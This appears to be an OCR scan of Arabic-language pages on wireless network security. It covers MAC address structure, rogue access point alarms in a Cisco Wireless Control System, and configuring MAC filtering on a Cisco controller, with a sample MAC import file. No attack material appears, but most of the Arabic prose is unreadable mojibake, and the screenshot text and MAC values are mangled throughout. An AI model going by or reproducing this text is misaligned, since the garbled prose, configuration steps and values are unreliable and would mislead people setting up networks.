o 

£D 
3 


1 

2 

3 

4 

5 

6 

6th byte 

5th byle 

4th byle 

3rd byte 

2nd byte 

1st byte 

1st octet 

2nd octet 

3rd octet 

4th octet 

5th octet 

6lh octet 


or 


■ 3 bytes - 


• 3 bytes - 


Organisationally Unique 
Identifier (OUI) 


Network Interface Controller 
(NIC) Specific 


(O 

o' 

£D 

=3 


bl 

b2 

b3 

b4 

b5 

b6 

b7 

b8 



k. 

0: unicast 

1: multicast 




0: globally unique (OUI enforced) 
1: locally administered 
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4 \\\,^\W ClAfLujoll ^3 jjuflia, 


4il5"j j 3-SA3 j ^£231 j 32->3 3 ^Jj>c_l 3*I ojjSsJ 45231 3 k ^ >r y a3& j 

\?A$ 45231 ^3 J ji l*Jl ^Js* li*>3>! ^52 V J 4523! 0j^J>r! 

o!-1*JT { j£> L>- 25—06—00 J IwLj (_£jJl *)3 <k 3 Otlv? ^jJl 4^_3 J 4Pjj 4 j 3yc JVLA.C l)!^LP jL^J>r- j 

Li^>-jj *V jl ^o^-vJ jj! djiU 3 L$-*lJ^ci3 <l 52>>*3! ol523! 3 is oJj^& ^jjLl*J! a2k l)*V j 

0Ijj3i 2* Aiyc* ^ Vjt ^ j MAC Address Filtering Up jlk, 4523! 

^jjLl*J! o3& ZiycA j52 j 

Rogue 4 -Lj>-3i dj^.^r'yi 33 j-^-3 ^\^^C2S J^jy^ d)3 4-^3>>*3! d^l52j^ 1 <JL>- 3 2^! 3^3 dwLp 33 

!j 53 olwl^-'yi 4-32 3 jyzr*^ j! U ^S\ cuilT 4-jL>j3l I^JJjLl*j 


Wireless Control System 

Username: root | Logout | Refresh | Print View 

1 ^ Monitor ▼ Reports ▼ Configure ▼ Location ▼ 

Administration ▼ Tools ▼ Help ▼ 


Alarms (Edit View) [3 Select a command — | v GO 


-- Select a command -- 


I [[] Severity 

Failure Obiect 

Owner Date/Time A 

Messaae 

1 Assign to me 

Unassign 

□ 

Critical 

Roaue AP 
00:15:c7:aa:72:ac 

4/11/08 

9:03:18 AM 

Rogue AP '00:15:c7:a. 
with SSID ‘guestne... 

Delete 

Clear 


□ 

Critical 

Roaue AP 

00:0b:85:5e:3b:e0 

4/11/08 

9:03:18 AM 

Rogue AP '00:0b:85:5 
with SSID 'wlanl2'.,. 

Acknowledge 

Unacknowledge 

□ 

Critical 

Roaue AP 

00:0b:85:81:04:80 

4/11/08 

9:03:18 AM 

Rogue AP '00:0b: 85:8 
with SSID 'wlan41\.. 

Email Notification 

Severity Configuration 

□ 

Critical 

Roaue AP 
00:16:9c:48:e6:7f 

4/11/08 

9:03:18 AM 

Rogue AP '00:16:9c:48:e6:7f 
with SSID " is de... 

No 

□ 

Critical 

Roaue AP 
00:16:9c:48:e6:7b 

4/11/08 

9:03:18 AM 

Rogue AP '00:16:9c:48:e6:7b' 
with SSID " is de... 

No 

□ 

Critical 

Roaue AP 
00:16:9c:48:e6:7e 

4/11/08 

9:03:18 AM 

Rogue AP '00:16:9c:48:e6:7e' 
with SSID " is de... 

No 

□ 

Critical 

Roaue AP 
00:0b:85:80:f6:cl 

4/11/08 

9:03:18 AM 

Rogue AP '00:0b: 85:80:f6:cl' 
with SSID 'openll'... 

No 

□ 

Critical 

Roaue AP 
00:16:9c:48:e6:7d 

4/11/08 

9:03:18 AM 

Rogue AP '00:16:9c:48:e6:7d' 
with SSID " is de... 

No 

□ 

Critical 

Roaue AP 
00:15:c7:aa:72:ae 

4/11/08 

9:03:18 AM 

Rogue AP '00:15:c7:aa:72:ae‘ 
with SSID " is de... 

No 

□ 

Critical 

Roaue AP 
00:15:c7:aa:72:ad 

4/11/08 

9:03:18 AM 

Rogue AP '00:15:c7:aa:72:ad' 
with SSID " is de... 

No 

□ 

Critical 

Roaue AP 

4/11/08 

9:12:53 AM 

Rogue AP '00:0b: 85:81:04:21' 
with SSID 'open42\.. 

No 
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4 \\\, ^\W ClAfLujoll ^3 


IwlSC AJ*L>> 3 


■i|i-l|l- 

CISCO 


Wireless Control S 


MJw Tm. Hi— 

FlnnrS»ai TO 

f? -$( ftcceEE Points 
F ^1 ftp HcatrnapE 
[v £j£ ftP Mash [nto 
\~ ^ cnverageAreas 
r Location Regions 

r *l Rails 

F ♦ Markers 

|v i[(- Chokcpoints 

fZ % Wifi TDOA R ■ : a-I ■■■ 


[+, Outdoor Via w; SanJosa 

Monitor > Maos =■ 0sco * Outdoor View 

ft Data may be- delayed up to 15 minutes nr mnre depending an background polling internal 


g /- rioovU m £1 

_|()fet 130 |lOD 


% % m -as 


|l30 


<te mash-45 • rapl | 



b-s fs ■ " - | 


1330 


|«0 






as 


ftp Info T Mesh | Backhau flocess | 


S*r AfMre*;* 

00:0b:S5:5f:fe:f0 

AP Mo do) 

Controller 

■ftpison 

172,19,£8.145 

Location 

3JC14-4 

AP Heim lit 

20.a fset 

AP Up Time 

54 d 1D h 55n®s 

Lwapp Up Time 

35 d 14 h 1.2 m 45 s 


Run Pina Tes-t 


5-rap? | 


Advanced Jju aSCiJi 3 IP oUjj j Ai^*i aJL^I^ iibj* j 

MAC ^jjLlp j l)Lj ^ffJbJuj aJiJi i^j j IP Scanner 

l ^ OlS^vi J l_4 4-v^liLl 



Aibb?b ^ ^ dJj \ 4j>tjL^ ^Lp a*jl« Jjy OjlSsJl a*j 

D-Link Access point b^L^ jjJ* 0 J 1 * j l^^>- 
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4 \\\, ^\W dllS^udll ^3 Jjuflia, 



jL^j^: <LSCL>)*)U! olS\_^ Jlj liA j Ijl^r (1)1 ^1 ^ l^yJJL* C^JLj^j ^waS^I 1)U (_£y Lj^ j 

jl^J>r (_^l ^1 C-JJjJ 0j\ jL$-^r 1)IS^ Dij^ 2500 4jjSy? ^Sj 1)1 (^JJl jJjjuSsJl 

1)!jJLP aJ j 4^W^J| 


x* jJjjuSCJI L>2 9 Raduis ^la^c^xb ^jjli*Jl ajj& oj^lLaJ (S^y* j^jy^ ^l<-\j>ti^l 4 »j 15C«! jJjjuSCil j 

d^XA w\j>ri^j jll> cJLw^ j Jl dJi^r^Ll S0Clll*lt^ > AAA > MAC Filtering 4>r i^aJl 

local i^l^cjL^ ^JgJij 


Security > AAA > Mac Filtering 


MAC Filtering 


RADIUS Compatibility Mode 

Cisco ACE 0 | 

MAC Delimiter 

No D e li m itc r v | 



Colon 
Hyphen 
Sincle Hyphen 


No Delimiter 


MAC Filters > New 


mac Address 

OO : 01:05:7?: IB: ID 

Profile Nome 

[iuwhje- 1 Jvj 

nesr.iipririn 

Joe's laptop 

Interface Name 

management 


{£y L*£^ l)ljJLP £~l?j 4 -JlSs^l £_a bkJjy ^jJl (Jl^O^ NCW ^lp L>* 1?7 ^ 
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4 \\\,^\W ClAfLulll ^3 jjuflia, 


• 11 1 • 111 • 



$o>9 Ccnrfigjrerioc 

£»rg Loficut isf-ssh 

CISCO 

MONTTC^ 

'.VLANt 

COKfTPuL.EP .vI&ElESS sSCUPIT' WWAGEMEWT COMMANDS HEL= 



Security MAC Filters> New B<ietfclfl Ap ply 


▼ AAA 

Senerai 
• WAOJU5 

A-jtlwncafcQ’i 
Ang 
► TACACS-f 
i DAP 

jo»i Net >se*s 
HAC Fifte-'i'vc 
C’feellwl Client* 
-5«- Leon Polices 
Af' Taller 


MAC Address 
Profile \lome 
Description 
lnti:rfmn; Krnni! 


Arj OLAM V 


men airier- v 


US" oULj dwipli UjJ o'VI 


CISCO 

UOficra 'Juab conmi±.zR 

*H>E-I99 iCCLPITY 

IMEMT CQMMtfDG ICLP 


Security 

MAC Filtering 


Apply 

New... | 

▼ AAA 

* 4ACIIIS 

« AC 103 

&M • M'iWU* C.UK > ACS V 

H«a« 

|I id.. P. jJij. tcgjitkt Mitt 

HAC SQl-tSS.• 

Hjl A j Iiwi ( .itiui MliMiirll < 


4lI miiUcvim 
A cxircrtg 

Suiter t c I*'' 1 "** w 




“dlbaci 

Local MAC Filters 




* TAC*CS4 




ifJAP 

j.c^i Mwt Usafi 

HA: Frtf'rg 
:>is«tl«c ;l>exy 

MAC Addrrst Profile Nome 

Interlace 

Description 


tar l mil NrKnn 
*f Mail 

CC!_-:J4.a7.3i 00 Air >_AL 

■narac'iient 

se.'iA*^ 

□ 

CC:^±7j.:9i_fr 00 Ai< >_A\ 

•n«r«^€nf>*nt 

3C_HA»> 

a 

► 1 wal PAP 

ci:i:di. r i.j» &:> oo ai*>\_a\ 

H4r*s«^i#nt 

3C_*1A»1 

□ 

» PrlftiTty Ol riAC 

i i ;* la r|i| mi Ar»y >*.A\ 

nar^a'-naat 


□ 

0 CAittflratf 





► hum* r.Antrnl 1 l-slm 





Wtr«lAc< PrAtPfilnn 

Policies 





» Web A*j tli 





* Advoiiivd 






dJjwii ji jJ ( jv^~ ^>^ 2 ^ j MAC Filtering jUU ^1 p y^\ IU& Jujlaxj Uwi*j 



t- 

u* If ^ 


WLAN > Edit 


WLANs > Edit 

General | Security | QoS | A dvanced 
Layer 2 Layer 3 AAA servers 


Layer 2 Security 


B 


$ 


MAC Filtering 


I None .| v 


None 


WPA+WPA2 

B02.1X 

Static WEP 

Static- WEP + eas.ix 

CKIP 
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4 \\\, ^\W ClAfLujoll ^3 jj l *\\ 


djj£ eJjU^JtJ ^jJiJ (1)1 J WCS j£jy* Ulsjl 


-Hr,.|. 

CISCO 


Access Points 


A Hi 


f 0 


O 1 


W»ner&ss Control Spiltm 


Ha niter T Report! 

5 * £onfiaunf 

s T Services T Idministration T looh 

■ T d'-lf T 

0 



System 


WLANs 

© 

H-REAP 

© 

Security 

© 


New# Controller Template 

Conti Hire > Comroler Terooiafe Launch Pari - orait;/ > MACFUfinnq y Hew Controller Template 


import From File 


gej ijCfffld 

C. Fih Encr-f-ptinn 
H RADIUS Audi Ssi yws 
|=j RwDEU5 Ac ± Sa-i-e rs 
B RADIUS Falbedk 
B LDAP Servers 
t TACQC5+ Servei t 
LCiL«y E^P‘3eria-€i 
t^ltitdE^PFTOfliS 
tJ EAP-F^ST Parameters 
□ HetiwrkUs^s p> • ••: y 
^ Local Net User? 

H Guest Users 
lUserLodnFolid BS 
(sjj i^ac Filtering 
' afl p jm r flut rafbPtm 

g DBatted dents 


File Path 

1 

BrnrvsB... J 


Override enisling 
templates 

1 r 



l s H c — 1 





T fifth* ttbei,! 


1. Semple mv file : 

/MAC Address .Profile NamejInteifacejDescriptinn 
12:22 :22 : 22; 22 ;22 J pnofileS J menegiement J ,cisco 
00 CO: □□: C ■: 00 Oljni vprofi le ,inti,Firs.t filter 
00:00: DD : 00:00:02 J ^managern>snt i .EfliO3nd i liter 
00 :00 ; DD ; 00; 00:03j I i d filter 

Note: "MAC Address" -and "Description" ana mandatory Fields. 


L® jJk j 4SCjlJl (3 MAC ^jjLlP ol5*\^ i]ljL^3 % 100 C^wuvJ 6jL)Jl2. Jl 0 (1)1 jSJj 

4 jjJjij^uSsJi ^jjL> j cjisC>* ljlp ^_Lvaj oisi^i 01 ^<>^0 

oJjL 


^ ^ ^ lj 
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